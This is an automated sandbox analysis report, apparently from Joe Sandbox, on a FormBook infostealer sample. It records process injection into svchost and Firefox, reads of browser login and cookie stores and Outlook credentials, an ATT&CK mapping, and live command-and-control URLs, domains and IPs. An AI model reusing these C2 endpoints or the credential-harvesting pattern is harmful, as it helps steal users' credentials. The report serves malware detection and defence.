Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread register set: target process: 7296

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread APC queued: target process: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Document 151-512024.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 29B4008

Jump to behavior

Source: C:\Users\user\Desktop\Document 151-512024.exe

0_2_009A1201

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_00982BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00982BA5

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009AB226 SendInput,keybd_event,

0_2_009AB226

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009C22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_009C22DA

Source: C:\Users\user\Desktop\Document 151-512024.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Document 151-512024.exe"	Jump to behavior
Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Document 151-512024.exe

0_2_009A0B62

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009A1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_009A1663

Source: Document 151-512024.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Document 151-512024.exe, dZxfFeGGZbzJaFRaN.exe, 00000009.00000000.1295470303.0000000000C11000.00000002.00000001.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3689959643.0000000000C10000.00000002.00000001.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3689853702.0000000000E10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: dZxfFeGGZbzJaFRaN.exe, 00000009.00000000.1295470303.0000000000C11000.00000002.00000001.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3689959643.0000000000C10000.00000002.00000001.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3689853702.0000000000E10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: dZxfFeGGZbzJaFRaN.exe, 00000009.00000000.1295470303.0000000000C11000.00000002.00000001.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3689959643.0000000000C10000.00000002.00000001.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3689853702.0000000000E10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Manager
Source: dZxfFeGGZbzJaFRaN.exe, 00000009.00000000.1295470303.0000000000C11000.00000002.00000001.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3689959643.0000000000C10000.00000002.00000001.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3689853702.0000000000E10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_00960698 cpuid

0_2_00960698

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009B8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_009B8195

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_0099D27A GetUserNameW,

0_2_0099D27A

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_0097B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0097B952

Source: C:\Users\user\Desktop\Document 151-512024.exe

Code function: 0_2_009442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009442DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3686290568.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3688949432.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1392632147.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3690392371.0000000003620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1393386838.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: Document 151-512024.exe	Binary or memory string: WIN_81
Source: Document 151-512024.exe	Binary or memory string: WIN_XP
Source: Document 151-512024.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Document 151-512024.exe	Binary or memory string: WIN_XPe
Source: Document 151-512024.exe	Binary or memory string: WIN_VISTA
Source: Document 151-512024.exe	Binary or memory string: WIN_7
Source: Document 151-512024.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3686290568.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3688949432.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1392632147.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3690392371.0000000003620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1393386838.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009C1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_009C1204
Source: C:\Users\user\Desktop\Document 151-512024.exe	Code function: 0_2_009C1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_009C1806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	16 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	141 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Document 151-512024.exe	63%	ReversingLabs	Win32.Trojan.AgentTesla
Document 151-512024.exe	61%	Virustotal		Browse
Document 151-512024.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.antonio-vivaldi.mobi/fo8o/	0%	Avira URL Cloud	safe
http://www.kasegitai.tokyo/fo8o/?FBEd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8trWN3l8ixOWtQL9yeTsuNSglH2B9sA==&4h8=YPQX8Tch	100%	Avira URL Cloud	malware
http://www.empowermedeco.com	100%	Avira URL Cloud	malware
https://musee.mobi/vivaldi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHA	0%	Avira URL Cloud	safe
http://www.elettrosistemista.zip/fo8o/	100%	Avira URL Cloud	malware
http://www.donnavariedades.com/fo8o/?FBEd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pDU2kX3sntZxTqRpQa59jNJPZojQ7fw==&4h8=YPQX8Tch	0%	Avira URL Cloud	safe
https://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLta	0%	Avira URL Cloud	safe
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	0%	Avira URL Cloud	safe
http://www.empowermedeco.com/fo8o/	100%	Avira URL Cloud	malware
https://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ	0%	Avira URL Cloud	safe
http://www.rssnewscast.com/fo8o/	0%	Avira URL Cloud	safe
http://www.kasegitai.tokyo/fo8o/	100%	Avira URL Cloud	malware
http://www.660danm.top/fo8o/	100%	Avira URL Cloud	malware
https://musee.mobi/vivaldi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi	0%	Avira URL Cloud	safe
https://donnavariedades.com/fo8o?FBEd=l	0%	Avira URL Cloud	safe
http://www.elettrosistemista.zip/fo8o/?4h8=YPQX8Tch&FBEd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNnVmQq+khzPxid8+dZ7ofOMdeDHH5A==	100%	Avira URL Cloud	malware
http://www.magmadokum.com/fo8o/?4h8=YPQX8Tch&FBEd=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMRwjYf1n6/EmRSSw2BgpSj1BbNsbEQ==	100%	Avira URL Cloud	malware
http://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwnciuyQsy8w1cq+9C58fB3trEND4VQ==	0%	Avira URL Cloud	safe
http://www.magmadokum.com/fo8o/	100%	Avira URL Cloud	malware
http://www.donnavariedades.com/fo8o/	0%	Avira URL Cloud	safe
http://www.empowermedeco.com/fo8o/?FBEd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZVFf0Y/DWu0uYrbCSDy6fTugJKp8nA==&4h8=YPQX8Tch	100%	Avira URL Cloud	malware
http://www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==	0%	Avira URL Cloud	safe
http://www.rssnewscast.com/fo8o/?FBEd=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo8oWpH62KBeZ0RVxT0MiM3+/B0IJ8Q==&4h8=YPQX8Tch	0%	Avira URL Cloud	safe
http://www.660danm.top/fo8o/?4h8=YPQX8Tch&FBEd=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrIKb5dMy/A4l/RoFCElkJ//A4REmieQ==	100%	Avira URL Cloud	malware
http://www.goldenjade-travel.com/fo8o/	0%	Avira URL Cloud	safe
https://www.empowermedeco.com/fo8o/?FBEd=mxnR	100%	Avira URL Cloud	malware
http://www.antonio-vivaldi.mobi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZbzJQ+JklL0Sj0639iiSTIgkj8wGO6A==&4h8=YPQX8Tch	0%	Avira URL Cloud	safe
http://www.techchains.info/fo8o/	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
elettrosistemista.zip	195.110.124.133	true	false	unknown
www.660danm.top	34.111.148.214	true	false	unknown
empowermedeco.com	217.196.55.202	true	false	unknown
www.3xfootball.com	154.215.72.110	true	false	unknown
www.antonio-vivaldi.mobi	46.30.213.191	true	false	unknown
www.joyesi.xyz	185.237.107.49	true	true	unknown
www.goldenjade-travel.com	116.50.37.244	true	false	unknown
www.rssnewscast.com	91.195.240.94	true	false	unknown
www.techchains.info	66.29.149.46	true	false	unknown
shops.myshopify.com	23.227.38.74	true	false	unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	unknown
www.kasegitai.tokyo	202.172.28.202	true	false	unknown
www.magmadokum.com	unknown	unknown	true	unknown
www.donnavariedades.com	unknown	unknown	true	unknown
www.liangyuen528.com	unknown	unknown	true	unknown
www.empowermedeco.com	unknown	unknown	true	unknown
www.elettrosistemista.zip	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.empowermedeco.com/fo8o/	false	Avira URL Cloud: malware	unknown
http://www.donnavariedades.com/fo8o/?FBEd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pDU2kX3sntZxTqRpQa59jNJPZojQ7fw==&4h8=YPQX8Tch	false	Avira URL Cloud: safe	unknown
http://www.antonio-vivaldi.mobi/fo8o/	false	Avira URL Cloud: safe	unknown
http://www.kasegitai.tokyo/fo8o/?FBEd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8trWN3l8ixOWtQL9yeTsuNSglH2B9sA==&4h8=YPQX8Tch	false	Avira URL Cloud: malware	unknown
http://www.elettrosistemista.zip/fo8o/	false	Avira URL Cloud: malware	unknown
http://www.660danm.top/fo8o/	false	Avira URL Cloud: malware	unknown
http://www.donnavariedades.com/fo8o/	false	Avira URL Cloud: safe	unknown
http://www.magmadokum.com/fo8o/	false	Avira URL Cloud: malware	unknown
http://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwnciuyQsy8w1cq+9C58fB3trEND4VQ==	false	Avira URL Cloud: safe	unknown
http://www.rssnewscast.com/fo8o/	false	Avira URL Cloud: safe	unknown
http://www.elettrosistemista.zip/fo8o/?4h8=YPQX8Tch&FBEd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNnVmQq+khzPxid8+dZ7ofOMdeDHH5A==	false	Avira URL Cloud: malware	unknown
http://www.magmadokum.com/fo8o/?4h8=YPQX8Tch&FBEd=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMRwjYf1n6/EmRSSw2BgpSj1BbNsbEQ==	false	Avira URL Cloud: malware	unknown
http://www.kasegitai.tokyo/fo8o/	false	Avira URL Cloud: malware	unknown
http://www.rssnewscast.com/fo8o/?FBEd=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo8oWpH62KBeZ0RVxT0MiM3+/B0IJ8Q==&4h8=YPQX8Tch	false	Avira URL Cloud: safe	unknown
http://www.empowermedeco.com/fo8o/?FBEd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZVFf0Y/DWu0uYrbCSDy6fTugJKp8nA==&4h8=YPQX8Tch	false	Avira URL Cloud: malware	unknown
http://www.660danm.top/fo8o/?4h8=YPQX8Tch&FBEd=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrIKb5dMy/A4l/RoFCElkJ//A4REmieQ==	false	Avira URL Cloud: malware	unknown
http://www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==	false	Avira URL Cloud: safe	unknown
http://www.antonio-vivaldi.mobi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZbzJQ+JklL0Sj0639iiSTIgkj8wGO6A==&4h8=YPQX8Tch	false	Avira URL Cloud: safe	unknown
http://www.goldenjade-travel.com/fo8o/	false	Avira URL Cloud: safe	unknown
http://www.techchains.info/fo8o/	false	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmp	false		high
https://musee.mobi/vivaldi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHA	netbtugc.exe, 0000000A.00000002.3692885046.000000000428A000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000002FEA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ	netbtugc.exe, 0000000A.00000002.3692885046.00000000040F8000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000002E58000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://track.uc.cn/collect	netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp	false		high
